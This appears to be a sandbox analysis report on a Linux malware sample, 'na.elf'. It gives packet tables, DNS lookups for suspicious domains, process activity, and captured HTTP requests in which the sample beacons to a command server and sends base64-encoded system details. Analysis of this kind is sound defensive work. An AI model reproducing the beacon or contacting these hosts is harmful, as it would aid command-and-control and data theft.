Apr 1, 2025 01:47:59.034013987 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.060070992 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.060111046 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.138709068 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.138796091 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.164545059 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.164597988 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.242621899 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.242666960 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.266611099 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.266685963 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.347820997 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.347888947 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.368526936 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.368565083 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.454289913 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.454336882 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.467895985 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.498265982 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.498305082 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.560024023 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.601489067 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.601525068 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.601526022 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.629602909 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.629709005 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.703664064 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.703700066 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.703749895 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.734555006 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.734606028 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.734658003 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.805013895 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.805049896 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.805104017 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.840461016 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.840497017 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.840553999 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.905189991 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.905224085 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.905273914 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.943252087 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.943285942 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:47:59.943443060 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:47:59.965727091 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.016971111 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.020241022 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.020292044 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.020508051 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.047302008 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.047333956 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.047581911 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.134785891 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.134836912 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.134838104 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.134887934 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.240050077 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.240113974 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.248348951 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.248404980 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.336847067 CEST	42836	443	192.168.2.23	91.189.91.43
Apr 1, 2025 01:48:00.345740080 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.345807076 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.357964993 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.358006954 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.358052015 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.358052015 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.454422951 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.454497099 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.454552889 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.472214937 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.496823072 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.496881962 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.555454016 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.555501938 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.555573940 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.597949028 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.598007917 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.598064899 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.613595963 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.645104885 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.645143032 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.645157099 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.696782112 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.721041918 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.721077919 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.721167088 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.821727037 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.821863890 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.821916103 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.821917057 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:00.947999001 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:00.948066950 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.036550999 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.036607981 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.036627054 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.036660910 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.104757071 CEST	42516	80	192.168.2.23	109.202.202.202
Apr 1, 2025 01:48:01.131431103 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.131509066 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.143912077 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.208724022 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.228208065 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.228243113 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.228328943 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.316014051 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.316492081 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.316582918 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.342118979 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.342201948 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.346162081 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.377032995 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.436702013 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.446382999 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.446423054 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.446448088 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.446475983 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.540456057 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.540508986 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.540532112 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.541584015 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.555110931 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.555197954 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.577135086 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.652447939 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.652530909 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.754431963 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.754467964 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.754482031 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.754549026 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.847728014 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.847851992 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:01.863759995 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:01.924612045 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.025918007 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.025979042 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.043555021 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.043593884 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.128719091 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.128819942 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.148706913 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.232606888 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.233449936 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.335824013 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.335922003 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.353955984 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.437793016 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.437858105 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.458920956 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.540142059 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.540273905 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.557446003 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.640533924 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.643183947 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.677166939 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.677270889 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.750296116 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.779336929 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.779373884 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.779392958 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.829190016 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.829301119 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:02.889791965 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.889844894 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:02.889913082 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:03.287533045 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:03.287604094 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:03.760211945 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:03.760317087 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:03.768451929 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:03.802891970 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:03.856200933 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:03.856755972 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:03.897002935 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:03.897080898 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:03.946151018 CEST	80	58304	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:03.946240902 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:03.953656912 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:04.154119015 CEST	80	58304	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:04.189496994 CEST	80	58304	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:04.189583063 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:04.207448959 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:04.247853994 CEST	80	58304	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:04.247905970 CEST	58304	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:04.354185104 CEST	80	58304	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:07.193387032 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:07.336112976 CEST	80	58306	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:07.336190939 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:07.481280088 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:07.682250977 CEST	80	58306	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:07.772232056 CEST	80	58306	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:07.772289038 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:07.834861994 CEST	80	58306	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:07.875823021 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:07.964232922 CEST	58306	80	192.168.2.23	152.36.128.18
Apr 1, 2025 01:48:08.108702898 CEST	80	58306	152.36.128.18	192.168.2.23
Apr 1, 2025 01:48:09.357903004 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:09.357903004 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:09.462831974 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:09.462886095 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:09.463860035 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:09.463920116 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:09.466613054 CEST	443	55240	199.232.90.49	192.168.2.23
Apr 1, 2025 01:48:09.466674089 CEST	55240	443	192.168.2.23	199.232.90.49
Apr 1, 2025 01:48:15.694941044 CEST	43928	443	192.168.2.23	91.189.91.42
Apr 1, 2025 01:48:25.933490038 CEST	42836	443	192.168.2.23	91.189.91.43
Apr 1, 2025 01:48:32.076852083 CEST	42516	80	192.168.2.23	109.202.202.202
Apr 1, 2025 01:48:56.649466991 CEST	43928	443	192.168.2.23	91.189.91.42
Apr 1, 2025 01:49:17.126611948 CEST	42836	443	192.168.2.23	91.189.91.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2025 01:50:09.133975029 CEST	39619	53	192.168.2.23	8.8.8.8
Apr 1, 2025 01:50:09.247078896 CEST	53	39619	8.8.8.8	192.168.2.23
Apr 1, 2025 01:50:09.248434067 CEST	42875	53	192.168.2.23	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 1, 2025 01:50:09.133975029 CEST	192.168.2.23	8.8.8.8	0x188c	Standard query (0)	xinchaodbcfda.com	A (IP address)	IN (0x0001)	false
Apr 1, 2025 01:50:09.248434067 CEST	192.168.2.23	8.8.8.8	0x188c	Standard query (0)	xinchaodbcfda.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 1, 2025 01:50:09.247078896 CEST	8.8.8.8	192.168.2.23	0x188c	Name error (3)	xinchaodbcfda.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

152.36.128.18

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	58304	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 01:48:03.953656912 CEST	76	OUT	GET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0 Host: 152.36.128.18
Apr 1, 2025 01:48:04.189496994 CEST	179	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 23:48:04 GMT Server: Apache/2.4.41 (Win64) Content-Length: 7 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 73 79 73 69 6e 66 6f Data Ascii: sysinfo

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	58306	152.36.128.18	80

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 01:48:07.481280088 CEST	703	OUT	GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0 Host: 152.36.128.18
Apr 1, 2025 01:48:07.772232056 CEST	224	IN	HTTP/1.1 200 OK Date: Mon, 31 Mar 2025 23:48:07 GMT Server: Apache/2.4.41 (Win64) Content-Length: 3 Connection: close Content-Type: text/html; charset=windows-1251 Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a Data Ascii: ok!Content-type: text/html; charset=windows-1251

System Behavior

Analysis Process: dash PID: 6211, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 6211, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: dash PID: 6212, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cat PID: 6212, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.ROSySM6ZUJ
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6213, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: head PID: 6213, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6214, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: tr PID: 6214, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6215, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cut PID: 6215, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6216, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cat PID: 6216, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/cat
Arguments:	cat /tmp/tmp.ROSySM6ZUJ
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6217, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: head PID: 6217, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/head
Arguments:	head -n 10
File size:	47480 bytes
MD5 hash:	fd96a67145172477dd57131396fc9608

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6218, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: tr PID: 6218, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/tr
Arguments:	tr -d \\000-\\011\\013\\014\\016-\\037
File size:	51544 bytes
MD5 hash:	fbd1402dd9f72d8ebfff00ce7c3a7bb5

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6219, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cut PID: 6219, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 6220, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 6220, Parent PID: 4331

General

Start time (UTC):	23:47:49
Start date (UTC):	31/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: na.elf PID: 6233, Parent PID: 6135

General

Start time (UTC):	23:47:53
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

File Activities

File Opened

File Deleted

File Read

File Written

Permission Modified

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: na.elf PID: 6236, Parent PID: 6233

General

Start time (UTC):	23:47:53
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6236, Parent PID: 6233

General

Start time (UTC):	23:47:53
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep na.elf"
File size:	129816 bytes
